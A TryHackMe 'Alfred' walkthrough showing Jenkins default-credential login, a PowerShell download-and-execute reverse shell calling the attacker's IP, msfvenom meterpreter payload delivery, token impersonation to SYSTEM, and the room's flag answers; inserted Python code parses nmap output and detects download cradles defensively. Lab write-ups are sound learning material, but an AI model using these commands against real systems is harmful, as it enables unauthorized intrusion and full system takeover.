
Alfred – Try Hack Me
CTF Walk through

Task 1

Target IP: 10.10.225.64

To scan the target machine we use:

nmap -p- -sV -sC -oN nmap-all -Pn 10.10.225.64

-p-   scan all ports
-sV   show service version info
-sC   run the default scripts
-oN … write the scan result to a file (nmap-all)
-Pn   treat all hosts as online (I usually use it, but this room suggested it in case nmap had problems with the scan)

We find 3 TCP ports open: 80, 3389 and 8080.
answer 1: 3
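The -oN file written above is plain text, so the open-port count and the services worth browsing next can be pulled out of it programmatically instead of by eye. The parser below is an added example, not part of the original walkthrough or of nmap; the sample it reads is a constructed -oN file whose three open ports match the room, while the VERSION column and the script lines are made-up values.

```python
import re
from dataclasses import dataclass

# Constructed sample of an nmap "normal" (-oN) output file. The three open ports
# match the walkthrough; the VERSION column and the script lines are made up
# for this example and are not the real scan output.
SAMPLE_NMAP_ALL = """\
# Nmap 7.93 scan initiated as: nmap -p- -sV -sC -oN nmap-all -Pn 10.10.225.64
Nmap scan report for 10.10.225.64
Host is up (0.12s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE        VERSION
80/tcp   open  http           Example-Web-Server 1.0 (constructed)
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ms-wbt-server?
8080/tcp open  http           Example-Servlet-Container 9.4 (constructed)
|_http-server-header: Example-Servlet-Container(9.4)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# Nmap done -- 1 IP address (1 host up) scanned in 200.00 seconds
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version...>]".
# Script output lines start with "|" and never match, nor does the header row.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_normal(text: str) -> list[PortEntry]:
    """Return one PortEntry per port line found in -oN output."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m is None:
            continue
        entries.append(PortEntry(
            port=int(m["port"]),
            proto=m["proto"],
            state=m["state"],
            service=m["service"],
            version=(m["version"] or "").strip(),
        ))
    return entries


def open_ports(entries: list[PortEntry]) -> list[int]:
    """Port numbers whose state is exactly 'open' (not open|filtered etc.)."""
    return [e.port for e in entries if e.state == "open"]


def web_ports(entries: list[PortEntry]) -> list[int]:
    """Open ports nmap identified as HTTP, i.e. the ones worth browsing next."""
    return [e.port for e in entries if e.state == "open" and e.service.startswith("http")]


if __name__ == "__main__":
    found = parse_nmap_normal(SAMPLE_NMAP_ALL)
    print("open ports:", open_ports(found))   # [80, 3389, 8080]
    print("web ports:", web_ports(found))     # [80, 8080]
```

Matching only lines that start with a port number keeps the NSE script output (the lines beginning with "|") and the column header out of the result, and checking for the exact state "open" avoids counting "open|filtered" guesses as confirmed services.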

We visit 10.10.225.64:80 but only find a picture of Bruce W., and nothing useful in the source code.

So we visit 10.10.225.64:8080 and find a login page.
After searching for the default Jenkins credentials we discover that the username is admin, and after trying the most commonly used passwords we discover that it is also the password.
answer 2: admin:admin

Still on the web page, following the instructions we find the command-line input under project/configure/build, and we copy the command below into it and edit it:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.2.193:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.2.193 -Port 1223

Then we download the file Invoke-PowerShellTcp.ps1 and, from the folder it was downloaded to, we start a web server so we can transfer the payload:

sudo python3 -m http.server 80

In another terminal we open a netcat listener:

nc -lvnp 1223

Then we go back to the website interface and press the Build Now button to gain the shell.

Looking back at the terminal we should have the shell. Now we look for the flag, which is in C:\Users\bruce\Desktop, and after reading the file with cat we get
answer 4: 79007a09481963edf2e1321abd9ae2a0

Task 2 – Switching Shells

In a new terminal, paste and modify the following to create the file:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.2.193 LPORT=2323 -f exe -o shell-name.exe

Then go to the attack machine and paste and adjust the code they provide:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.2.193:80/shell-name.exe','shell-name.exe')"

Before executing the code we need to start the meterpreter handler in msfconsole (press Enter after each line):

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.9.2.193
set LPORT 2323
run

After the handler listener is set up, we go back to the target PowerShell terminal and type:

Start-Process "shell-name.exe"

and we gain a meterpreter shell.

answer 5: 73802 (we can see that in the msfvenom section)
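Both the Task 1 build step and the Task 2 download command are PowerShell download cradles: one command that fetches code from the network and runs or stages it. That shape is what a Jenkins build-log or PowerShell script-block monitor should flag, because a build server that will run arbitrary shell commands behind default credentials is exactly what made this room possible. The detector below is an added example from a defender's side, not code from the room, the author or any tool named here; the two flagged records are the commands already shown in Task 1 and Task 2, while the record sources and the benign build-step commands are constructed for contrast.

```python
import re

# Indicators of a "download cradle": a command that fetches code from the network
# and runs it in one step. The Jenkins build step in Task 1 and the Task 2
# download command are the shapes this is meant to catch.
CRADLE_INDICATORS = {
    "webclient":       re.compile(r"Net\.WebClient", re.I),
    "download_string": re.compile(r"\.DownloadString\(", re.I),
    "download_file":   re.compile(r"\.DownloadFile\(", re.I),
    "invoke_expr":     re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "raw_ip_url":      re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I),
}

# Constructed log records: (source, command text). The first two are the commands
# used in this walkthrough; the rest are benign build-step commands made up for contrast.
SAMPLE_RECORDS = [
    ("jenkins-build-step",
     "powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.2.193:80/Invoke-PowerShellTcp.ps1');"
     "Invoke-PowerShellTcp -Reverse -IPAddress 10.9.2.193 -Port 1223"),
    ("powershell-scriptblock",
     "powershell \"(New-Object System.Net.WebClient).Downloadfile('http://10.9.2.193:80/shell-name.exe','shell-name.exe')\""),
    ("jenkins-build-step", "powershell -File C:\\build\\run-tests.ps1 -Configuration Release"),
    ("jenkins-build-step", "msbuild project.sln /p:Configuration=Release"),
]


def indicators(cmd: str) -> list[str]:
    """Names of every indicator pattern that matches the command line."""
    return [name for name, rx in CRADLE_INDICATORS.items() if rx.search(cmd)]


def classify(cmd: str) -> str:
    """
    download-and-execute: fetched text is handed straight to Invoke-Expression
    download:             a file or string is fetched from the network
    benign:               none of the above
    """
    hits = set(indicators(cmd))
    if "invoke_expr" in hits and hits & {"download_string", "webclient"}:
        return "download-and-execute"
    if hits & {"download_string", "download_file"}:
        return "download"
    return "benign"


def scan(records):
    """Return (source, verdict, matched indicators) for every non-benign record."""
    alerts = []
    for source, cmd in records:
        verdict = classify(cmd)
        if verdict != "benign":
            alerts.append((source, verdict, indicators(cmd)))
    return alerts


if __name__ == "__main__":
    for source, verdict, hits in scan(SAMPLE_RECORDS):
        print(f"{source}: {verdict} ({', '.join(hits)})")
```

The verdict is built from combinations rather than a single keyword: WebClient alone appears in legitimate scripts, but WebClient plus Invoke-Expression in one command line is the download-and-execute pattern, and a raw-IP URL is reported as a supporting indicator because build servers normally pull from named hosts. In a real deployment the records would come from the Jenkins build console output or PowerShell script-block logging rather than the inline list.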

Task 3 – Privilege Escalation

Still in the meterpreter shell, because whoami /priv doesn't work we follow the second set of instructions and type:

use incognito

then, to view the available tokens:

list_tokens -g

To use the token:

impersonate_token "BUILTIN\Administrators"

and type the following to reveal the answer to the question:

getuid

answer: NT AUTHORITY\SYSTEM

Now, for the final answer, we need to migrate to services.exe, so to see its PID we type:

ps

We discover that the PID is 668, so we type:

migrate 668

Then we go to the C:\Windows\system32\config folder and cat root.txt to obtain the flag.

final answer: dff0f748678f280250f25a45b8046b4a
